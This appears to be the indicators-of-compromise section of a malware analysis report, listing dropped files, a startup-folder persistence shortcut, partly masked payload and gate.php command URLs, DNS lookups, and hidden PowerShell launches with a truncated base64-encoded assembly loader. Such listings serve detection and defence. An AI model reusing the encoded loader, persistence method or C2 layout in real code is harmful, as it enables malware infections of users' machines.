Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\google.ini.lnk
- %APPDATA%\fgartistpro.exe
- %APPDATA%\01.js
- %HOMEPATH%\appdata\google.js
- http://ip##fo.io/ip
- http://ip##fo.io/country
- http://ma###ina.top/bit/I.mp3
- http://ma###ina.top/8/gate.php
- DNS ASK ma###ina.top
- DNS ASK ip##fo.io
- '%APPDATA%\fgartistpro.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\01.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...